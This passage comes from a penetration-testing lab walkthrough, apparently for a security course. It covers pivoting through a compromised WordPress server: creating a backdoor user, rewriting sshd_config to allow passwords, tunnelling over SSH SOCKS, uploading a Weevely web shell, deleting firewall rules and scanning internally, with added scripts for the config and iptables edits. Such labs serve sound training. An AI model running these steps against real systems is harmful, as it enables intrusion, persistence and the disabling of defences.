php file, you should get the call back to your Metasploit terminal session. You will see the
following in the terminal window.

Source: Metasploit in terminal

You will know that you have a callback when you see "Meterpreter session 1 opened". Now that
you have the callback, you will run a few checks to see what level of access you have. You will
need to drop into a shell to run them. In the Meterpreter terminal window, type the following:

shell

This will drop your current session down into a shell session.
Source: Metasploit in terminal

Now, check which account the session is running as with the whoami command. Type in the
terminal

whoami

The output shows the account your shell runs as. Because the shell was spawned by the web
server, this is the web server's service account, not root, which is why the commands in the
following parts are prefixed with sudo.

Source: Metasploit in terminal

Part 8
Now that you have access to the system, you need to make a new user account to maintain
access. You will make a user named bob with the password bob. In the current session window,
type sudo adduser bob and press Enter. This creates the user bob. Now set the password for the
user: type sudo passwd bob and then enter bob twice. You will see the following when you are
done. Note that these sudo commands only succeed because the lab image lets the web server's
account run sudo without a password; on a hardened target you would have to escalate
privileges first.
Source: Terminal

Now that you have a user on the system, you will use that system to pivot to the next part of
the network. Pivoting is the act of leapfrogging from one compromised host to another. Attackers
use pivoting to reach network segments that they cannot reach directly. To do this, you will use
SSH dynamic port forwarding (-D) to create a SOCKS proxy on local port 3434 that tunnels
through the web server. Open a new terminal window and type the following:

sudo ssh -D 3434 bob@192.168.10.111

Source: Terminal

As you can see, the SSH login fails with a permission-denied error: the server's sshd accepts
only public-key authentication, and bob has no key. To bypass this, you will download a copy of
the server's sshd_config, turn password authentication on, and put the file back. Attackers
sometimes modify configuration files in exactly this way to gain access to other parts of a
system.

Part 9

Now, go back to the terminal window with the Meterpreter session to the first web server. Now
we will use Meterpreter to download a copy of the sshd_config file. Within the Meterpreter
session, type the following.

exit

This will take you out of the shell session and back into the meterpreter session. The screen
should look like the following:
Source: Metasploit in terminal

Now, within Meterpreter, you will download a copy of the sshd_config. Within the Meterpreter
session, type the following:

download /etc/ssh/sshd_config /home/StudentFirst/Desktop/sshd_config

The Meterpreter session will tell you that it is downloading the file and then the file is
downloaded.

Source: Metasploit in terminal

After the Meterpreter session tells you that the file was downloaded, you should also see the file
on your desktop.
Source: Kali desktop

Now, right-click and select rename, and change the name to sshd_configOld. Then right-click on
the sshd_config file and then select “Open with Leafpad.”
Source: Kali desktop

Look in the file for "#PasswordAuthentication yes" and remove the "#". Then look for
"PasswordAuthentication no" and add a "#" in front of it. A leading "#" marks a line as a
comment that sshd ignores, so adding or removing it turns that setting off or on. Both edits are
needed because sshd uses the first uncommented occurrence of an option and ignores any later
ones.
Source: Leafpad

Now look for "UsePAM yes" and change "yes" to "no", so the line reads "UsePAM no". After the
three changes have been made, save the file as "sshd_config".

Source: Leafpad

Then, go back to the Meterpreter session terminal and type the following command to upload
the file back to the web server. You will upload the file to the tmp directory. This is done to allow
you to move the file from the tmp directory over the top of the old sshd_config file.

upload /home/StudentFirst/Desktop/sshd_config /tmp/sshd_config

Source: Metasploit in terminal


Now, we need to drop back into a shell within the Meterpreter session. Type the following
command:

shell

Source: Metasploit in terminal

Now, you need to move the file into place and then stop and start the sshd service. Before
overwriting the live file, check that sshd accepts the uploaded copy with
sudo sshd -t -f /tmp/sshd_config: if the new file contains an error, sshd will refuse to start
and you lose the SSH path you are trying to open. Enter the following command:

sudo cp /tmp/sshd_config /etc/ssh/sshd_config


Source: Metasploit in terminal

Next, stop and then start the SSH service so that it reloads the new configuration. Type the
following commands:

sudo service sshd stop


sudo service sshd start

Source: Metasploit in terminal

Now, enter the following command to create the socks proxy.

sudo ssh -D 3434 bob@192.168.10.111

When prompted, first enter StudentFirst's password (sudo asks for it; root is not actually
needed to bind a local port as high as 3434, but the lab runs ssh this way) and then bob's
password, "bob". You will see the following before you type the password. After the session is
created, the window will look as follows. Unlike the first attempt, now that the configuration
has been changed and reloaded, the SSH connection succeeds and the SOCKS proxy is listening on
127.0.0.1:3434.

Source: Terminal
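
As an added example for this page (not part of the lab), the following shell script makes the
same three sshd_config edits from Part 9 with sed on the downloaded copy, then reads the
settings back the way sshd resolves them. It assumes a stock Debian/OpenSSH-style sshd_config
layout and works on a constructed sample file, so it runs on Kali without touching any target:

```sh
#!/bin/sh
# Added example for this page, not the lab's own material.
# Applies the Part 9 edits to a downloaded sshd_config copy with sed and reads the
# result back the way sshd resolves options (first uncommented occurrence wins).
# Assumes a stock Debian/OpenSSH-style layout. UsePAM is matched case-insensitively
# because the lab text spells it "UsePam".

# enable_password_auth <file>
# Rewrites <file> in place and keeps the untouched original as <file>.orig.
enable_password_auth() {
    cfg="$1"
    cp "$cfg" "$cfg.orig" || return 1
    sed \
        -e 's/^[[:space:]]*#[[:space:]]*PasswordAuthentication[[:space:]][[:space:]]*[Yy][Ee][Ss]/PasswordAuthentication yes/' \
        -e 's/^[[:space:]]*PasswordAuthentication[[:space:]][[:space:]]*[Nn][Oo]/#PasswordAuthentication no/' \
        -e 's/^[[:space:]]*#*[[:space:]]*[Uu][Ss][Ee][Pp][Aa][Mm][[:space:]][[:space:]]*[Yy][Ee][Ss]/UsePAM no/' \
        "$cfg.orig" > "$cfg"
}

# effective_option <file> <option>
# Prints the value sshd will actually use: the first line whose first word is the
# option. Comment lines start with '#', so their first word never matches.
effective_option() {
    awk -v opt="$2" 'tolower($1) == tolower(opt) { print tolower($2); exit }' "$1"
}

# demo_sshd_edit
# Builds a constructed sshd_config fragment in a temp dir (not the lab's real file),
# edits it, and prints "<PasswordAuthentication> <UsePAM>", i.e. "yes no" on success.
demo_sshd_edit() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/sshd_config" <<'EOF'
# constructed sample modelled on the Debian defaults
Port 22
#PasswordAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM yes
EOF
    enable_password_auth "$dir/sshd_config" || return 1
    pa=$(effective_option "$dir/sshd_config" PasswordAuthentication)
    pam=$(effective_option "$dir/sshd_config" UsePAM)
    rm -rf "$dir"
    echo "$pa $pam"
}

# On Kali the real sequence would be:
#   enable_password_auth /home/StudentFirst/Desktop/sshd_config
#   effective_option /home/StudentFirst/Desktop/sshd_config PasswordAuthentication
demo_sshd_edit
```

effective_option is the check worth keeping: because sshd honours the first uncommented
occurrence, an uncommented "PasswordAuthentication no" higher up the file silently overrides a
"yes" below it, and the Leafpad edit would look correct while the login still fails.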
Part 10
You will now run a dirb scan against the second web server through the first one, by sending the
scan through the SOCKS proxy that your SSH session provides. Open a new terminal window and type
the following in the terminal:

sudo dirb http://hr.acme.com/ -p socks5://127.0.0.1:3434

The output will look like the first dirb scan. If hr.acme.com does not resolve from Kali, use
socks5h:// instead of socks5:// so that the name is resolved through the proxy on the web server
rather than locally (dirb hands the proxy string to libcurl, which understands both forms).

Source: Dirb in terminal

Part 11
You have now identified that the internal web server is also running WordPress. Within the
terminal, type the following command (the --proxy option sends the scan through the same SOCKS
proxy):

sudo wpscan -u http://hr.acme.com/wordpress --proxy socks5://127.0.0.1:3434

You will see the following in the terminal window:


Source: WPScan in terminal

Answer the following questions:

1. How many alerts and vulnerabilities are there?


2. What is the total number of red, yellow, and green items?
3. Do you see any vulnerabilities that have a remote code execution or arbitrary file
upload. Are there any other red alerts?

Include your answer in the final report.

Part 12

Now that you know that the internal web server has the same vulnerable plug-in, you will use a
similar attack to gain access to it. Minimize all of the windows and open Burp Suite, which is
found under "Applications" and then "Web Application Analysis". You will use Burp Suite to chain
your browser's web session through the SOCKS proxy and on to the internal web server. After Burp
Suite is open, open the web browser; you need to change its proxy settings. Click the menu icon
in the top right of the screen, then Preferences, then Advanced on the left side of the screen,
then Network, and then Settings. The last window should look like this:

Source: Firefox browser connection settings

Select Manual proxy configuration and point it at Burp's proxy listener (127.0.0.1, port 8080
by default), so that the browser sends every request to Burp. The window should look like the
window below. Then click OK.
Source: Firefox browser connection settings

Now go back to Burp Suite and click on "User options". You will see a section that says SOCKS
Proxy. Fill in the SOCKS proxy host 127.0.0.1 and port 3434 (the SSH dynamic forward from Part
9) and tick "Use SOCKS proxy"; if hr.acme.com does not resolve from Kali, also tick "Do DNS
lookups over SOCKS proxy". Fill it out so it looks like the below image:
Source: Burp Suite

Within Burp Suite, you also need to disable interception, otherwise every request will stall
until you forward it by hand. Go to the Proxy tab, then the Intercept sub-tab, and click the
"Intercept is on" button so that it reads "Intercept is off".

Part 13
Now, you will configure ProxyChains so that command-line tools are also routed through the first
web server for the next exploit. Open a new terminal and type the following command.

sudo vi /etc/proxychains.conf

Scroll to the [ProxyList] section at the bottom of the file and add the following line:

socks5 127.0.0.1 3434

Before you continue, you will also need to remove the following default entry. It points at a
Tor port that nothing is listening on in the lab, and if it is left in, ProxyChains will try to
chain through it and fail:

socks4 127.0.0.1 9050

Source: ProxyChains terminal

Then hit the Escape key, and type ​:wq​ and hit Enter.

Part 14
Now that ProxyChains is set, you will build a new payload. Use the terminal window you used to
modify the ProxyChains configuration file. The tool you will use next is not Metasploit; it is
called Weevely. Unlike the Metasploit payload, the PHP agent Weevely generates is protected with
a password, so only someone who knows that password can use the uploaded backdoor. Type the
following command (pass is the password; the last argument is where the agent file is written):

sudo weevely generate pass /home/StudentFirst/Desktop/wee.php

This will generate a new payload called “wee.php” on the desktop of the Kali system.

Source: Weevely in terminal

Now, open the "Download CST630 Project Resource" file found under Lab Resources and
Projects, which is located on the desktop. This shortcut opens a web page that lets you upload
a file to the web server. Double-click on "Download CST630 Project Resource.desktop", and
then select "launch anyway". When the browser is open, you will see the following web page:
Source: Firefox browser

Now, we need to upload the file to the web server. Click on the “Browse..” button and select the
wee.php file. After the file is selected, you will need to click on the “upload!” button. When the
file is uploaded, you will see “{"success":true,"fileName":"\/\/\/wee.php"}” on the web page. This
means that the file was uploaded to the web server.

Source: Firefox browser

After the file is uploaded, make sure you can see it is within the directory listing on the web
server. The dirb scan showed a listing of the upload directory. Go to the upload directory on the
web server. Once you are at the upload directory, take a screenshot showing that you found the
location of the file. You should see the following.

Source: Firefox browser

Now, open a terminal and enter the following command on one line (the final argument, pass, is
the password you chose when generating the agent):

sudo proxychains weevely http://192.168.10.112/wordpress/wp-content/uploads/wee.php pass

After you enter this command, you will see the following screen:
Source: Weevely in terminal

At this point, you interact with the system by entering Linux commands at the weevely prompt.
Weevely runs each command through the PHP agent rather than a real terminal, so interactive
commands that prompt for input (such as passwd, or sudo asking for a password) will not work. In
the terminal, enter the following command:

uname

Source: Weevely in terminal

However, you still cannot reach this host directly because of its firewall rules. You will now
remove the rule that blocks the Kali host so you can SSH to it directly. Type the following
command to list the INPUT chain with rule numbers (add -n if the listing is slow, so that
iptables does not reverse-resolve every address):

sudo iptables -L --line-numbers

This will list the firewall rules for the host.


Source: Weevely in terminal

Part 15
You will now delete the REJECT rule for the Kali host. In the lab it is rule 3 of the INPUT
chain; confirm the number from your own listing first, because deleting by number removes
whatever rule sits at that position. Enter the following command.

sudo iptables -D INPUT 3

Source: Weevely in terminal
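
Deleting by rule number is only safe when you are sure of the number, and rule 3 is specific to
this lab image. As an added example that is not part of the lab, the script below parses the
output of iptables -L INPUT -n --line-numbers (here a constructed sample modelled on the lab
host; the real listing will differ) to find the REJECT or DROP rules whose source is the Kali
address, and emits the delete commands highest-numbered first, because removing rule 3 renumbers
every rule after it:

```sh
#!/bin/sh
# Added example for this page, not the lab's own material.
# Finds the iptables rule(s) blocking a given source address in
# "iptables -L <chain> -n --line-numbers" output instead of assuming rule 3,
# and emits the delete commands in an order that keeps the numbers valid.

# reject_rules_for <source-ip>
# Reads the listing on stdin and prints the numbers of REJECT/DROP rules whose
# source column equals <source-ip>, highest number first. The order matters:
# "iptables -D INPUT 3" shifts every later rule up by one, so deleting lower
# numbers first would remove the wrong rules.
reject_rules_for() {
    awk -v ip="$1" '
        $1 ~ /^[0-9]+$/ && ($2 == "REJECT" || $2 == "DROP") && $5 == ip { print $1 }
    ' | sort -rn
}

# delete_commands <chain> <source-ip>
# Turns the rule numbers into the commands to run on the target (or pipe to sh).
delete_commands() {
    chain="$1"
    reject_rules_for "$2" | while read -r n; do
        echo "sudo iptables -D $chain $n"
    done
}

# Constructed sample listing, modelled on the lab host; on the real host use:
#   sudo iptables -L INPUT -n --line-numbers
sample_input_chain() {
    cat <<'EOF'
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
2    ACCEPT     tcp  --  192.168.10.111       0.0.0.0/0            tcp dpt:22
3    REJECT     all  --  192.168.10.101       0.0.0.0/0            reject-with icmp-port-unreachable
4    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0
5    DROP       all  --  192.168.10.101       0.0.0.0/0
EOF
}

# Against the sample this prints the delete for rule 5, then the one for rule 3.
sample_input_chain | delete_commands INPUT 192.168.10.101
```

Against the real host, pipe the live listing in
(sudo iptables -L INPUT -n --line-numbers | delete_commands INPUT 192.168.10.101) and run the
printed commands from the weevely prompt. Deleting by rule specification
(iptables -D INPUT -s 192.168.10.101 -j REJECT) avoids the numbering problem altogether, but it
only matches if it repeats the rule's options exactly, a non-default --reject-with type included.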

You will again add a user to the system. Because there is no terminal for adduser's own
password prompt, the password is set non-interactively with chpasswd, which reads user:password
pairs from standard input. Enter the following commands.

sudo adduser bob

echo 'bob:bob' | sudo chpasswd

Source: Weevely in terminal

Part 16
Now, remove the proxy setup from the browser by reversing the steps you did earlier in Part 12.
Then, in the weevely session, upload the modified sshd_config you prepared in Part 9 to the
internal web server's tmp directory:

file_upload /home/StudentFirst/Desktop/sshd_config /tmp/sshd_config

Source: Weevely in terminal

Then you need to move the file to the correct location. Enter the following command in the
terminal.

sudo cp /tmp/sshd_config /etc/ssh/sshd_config


Source: Weevely in terminal
Now, you need to start and stop the sshd service. Enter the following command:

sudo service sshd restart

Source: Weevely in terminal

Now you can SSH directly to the internal host. If the SSH session from Part 9 is still open,
close it first: local port 3434 is still in use by that session, so the new connection would
come up without its -D forward and ProxyChains would keep going through the first web server.
Type the following command:

sudo ssh -D 3434 bob@192.168.10.112

Part 17

Now that you have compromised the network, use the following command to show that you can reach
an internal workstation through the pivot. A SOCKS proxy only carries TCP connections, which is
why the scan uses -sT (full connect scan), -PN (skip host discovery, since ping probes cannot
pass through the proxy) and -n (no DNS lookups); SYN scans and UDP scans will not work through
ProxyChains:

sudo proxychains nmap -sT -PN -n -sV -p 80,443,21,22,3389 192.168.10.201

--------------
Note: You will see some new output when running this command. That output will look like the
top part of the screen below; it shows how ProxyChains is building the connections. This
command will take time to run.
--------------
Source: Nmap in terminal

Take a screenshot and add it to your report.

Now that you have access to the two systems in the network, see if you can get root on either
host.

Congratulations! You have now reached the end of the lab!
